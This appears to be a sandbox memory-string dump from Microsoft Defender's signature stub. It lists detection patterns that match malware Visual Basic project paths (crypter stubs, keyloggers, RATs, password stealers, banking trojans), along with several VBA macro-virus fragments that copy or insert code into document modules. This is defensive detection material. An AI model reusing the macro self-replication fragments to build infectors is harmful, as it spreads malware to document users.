Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: C:\\(DOCUME~1\|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win\|wix\|WS86).+?\.vbp
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: .VBProjects
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: phapoeskeezm.vbp
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	Binary or memory string: *\AD:\Lap Trinh\Virus Mau\Pro 3\Pro3.vbp
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: 72E:\\kaynak( Kod\|~1)\\spynma(il_Merged\|~1).+?\.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: @\Polifemo Ebrio Crypter\Stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+Hack\\.+\\inject\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: D:\\.{15}\\WEBPNT\\WebpNt\.vBp
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: 4Bomba logica\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: OJ.+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\.\\Desktop\\.\\Lite-Stub\\Obfuscated .\\..vbp
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: \RenoNevada\MainMango\Server.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: .+:\\.NOVO.+\\BLINDADO\\PluginBrada..vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: GB.+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString]
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: '".+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: C:\Documents and Settings\Administrator\My Documents\winrar\server\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: (\server\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: PAJ:\MASTER\bb_soft\bb_promo\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: >\legal notice viri\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: bho\VBBHO.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: worm2007.vbp
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: 1ocuments and Settings\Usuario\1scritorio\Ex\Ex.vbp]
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: .+\\Cryptosy\\Stub\\Stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: .+\\(BotSupho Compiler\|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: D:\\.+\\.+fcx\\.+1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: J*\AD:\Master\ADWARA_NEW\bho\VBBHO.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: JE.+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 2sharK\Server\Projekt1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter]
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: HMDCorP.vbp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: ^Systema So as ipanema tem\INSTALL\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: J\MSLoad.VB.Keylogger.Project\DOWN.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: = NormalTemplate.VBProject.VBComponents(1).CodeModule
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: :\\Jhocko\\Loader\\Loader.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: .+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: ^\ie.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: .+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: D:\\Setup\\Drivers\\Audio\\Installs_the_RealTek_AC_97_audio_driver\\WDM5630\\Documents\\Documents11\\Secret\\Basic\\Updated\\Dao chich\\final 007 spy\\.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: =8.+\\invasao\\aaaa_kit_trix\\NOVENBRO novo KIT GF.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\SqUeEzEr\Desktop\OPENSC CODES FROM ME\Downloader\.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)]
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: \TIOCARADEPENE\Proyecto1.vbp]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: .+:\\Apub\\Cyfjrvepg.vbp
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: >9C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: lgC:\\(DOCUME~1\|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win\|wix\|WS86).+?\.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: &Desktop\ery\ery.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: 50.+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: bradesco.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: +&.+:\\.+Hack\\.+\\inject\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: Safety.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: .+\\invasao\\aaaa_kit_trix\\NOVENBRO novo KIT GF.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	Binary or memory string: ,:\revolucao\SysBox.vbpax
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: 3.D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: ;6.+:\\.+\\Kraken\\Escritorio.+\\descarga\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: ~A*\AE:\ExeNew\ExeSyVbNew3\ExeSyVb\ExeClientOld360\ExeClient.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: 1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: (\LOADER\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: .+\\TUDO\\ARQUIVOS-NOVOS\\Downloader_pak.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: \Sp-Binder\Extracter\SpBinderExtracter.vbp]
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: .+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: >9.+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: Jwarka\kul\201-solitaire\Solitaire.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: H\EOF\Alfredo\Downloader\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: .+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: '".+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: :5.+:\\.+\\Cactilio - Joiner.+\\Src\\Stub\\YvcGVCI.vbp
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\.*\\StuB\\Pro.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1,
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.sln.\|%WINDIR%\Explorer.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: .\LoardR0x\System NT.vbp
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: .+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: J@*\AE:\RE9FA3~1\BUG_1_~1\XXXXXX~1.VBP
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: .)C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	Binary or memory string: .+Yakoza\\server\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: 6:\VB\own\ZB\ss\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: F:\prog lang\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: A*\AC:\Documents and Settings\HailuYa.ETHAIR\Desktop\pass\asterie.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: Virus\lsass.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: UPD:\\(BitComet\|BingDun\|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder\|ad)\.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: C:\\.A.\\B\\Base.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: :5C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	Binary or memory string: sload.vbp
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: %.com\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: \triploader.vbpP
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: E@.+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: :\PassStealer 3.0\Projekt1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: bTOYANO\otros virusillos\shell32\devil shell32.vbp
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	Binary or memory string: \GetIPAddresListFromHost\ForRobot\IPv6Chat.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: RMC:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	Binary or memory string: @.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: E:\\.+\\2010\\baidu.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: C:\winapp.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 2\folder_x\File Folder.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: 4/.+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: \ardCo011064.vbp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: \WinSysFix_1.5.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: .+:\\.*XXSourceXX\\PrjMain.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: Z:\vir\vrz\vrz\screencapture\screenCpature.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: *z:\ultimate\casa.vbp]
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Kraken\\Escritorio.+\\descarga\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: \WebNav.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: :\\.+\\Indetectables RAT.+p.+is.+\\SIN WINSOCK\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: .+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: B=.+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: PharOlniNe\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: rypter\stub.vbp]
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: F*\AE:\sharK\2.2\Server\Projekt1.vbpd[
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: PD:\Master\bb_soft\bb_loader\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: ,Neriopert\Kolidert.vbp]
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: \Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\User\\Desktop\\.pia de.fab\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: :\Users\jpvic\Desktop\VB6DLL\PROFULL_NODLL_SPLIT_AND_RES\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: z1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: \Users\Jatz0r\Desktop\jajajaja\anarko\DRONES 3.0.b\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: vbSendMail.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: vC:\Program Files\Microsoft Visual Studio\VB98\pjtbinder.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 1,.+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: Final RS Stealer\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: SN.+\\(BotSupho Compiler\|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: '"\\Explorador-Remoto\\Servidor.vbp
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: Dicionario.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\trampo novo.*\\.+\\Loader_DLL_OUT_GORDO\\TP_Auto.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: \W.+:\\Intel\\Obfuscated Number-[0-9]{1,3}\\Obfuscated Nr-[0-9]{1,3}\\[a-zA-Z]{5,15}.vbp
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: B=.+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: \\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: KeyBoardSpy.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: 50.+\\TUDO\\ARQUIVOS-NOVOS\\Downloader_pak.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: .@*\AG:\NEW\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: \Program Files\Microsoft Visual Studio\VB98\VB Projects\Viruses\HDKP4\HDKP_4.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: ,z:\abc\load\kombi.vbpxM
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: D:\\(BitComet\|BingDun\|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder\|ad)\.vbp
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	Binary or memory string: 8Business\Kitty Logger\KL.vbp]
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: ?:.+:\\trampo novo.*\\.+\\Loader_DLL_OUT_GORDO\\TP_Auto.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: F*\AD:\Junk Programs\Test_Passw20243252017\TestPwd\TestPwd.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: B=C:\\Users\\.\\Desktop\\.\\Lite-Stub\\Obfuscated .\\..vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 2Crypt3r\demonio666vip.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: \loaderFirefox.vbp
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: .v2\Pagina\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: Lkey logger project\logger\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: \KDWIN\KDWin.vbp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: &\SelectCaseEnum.vbp
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: \ad.vbp
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	Binary or memory string: .vbpa)
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: \Virus\Romeo.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: .:\\Explorer\\Explorer.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: .+keylogger.+server\.vbp
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: A*\AE:\My Programs\Trojans, PS,Hack , Crack\Molela\Molela 1.15 beta\Server\Project1.vbp
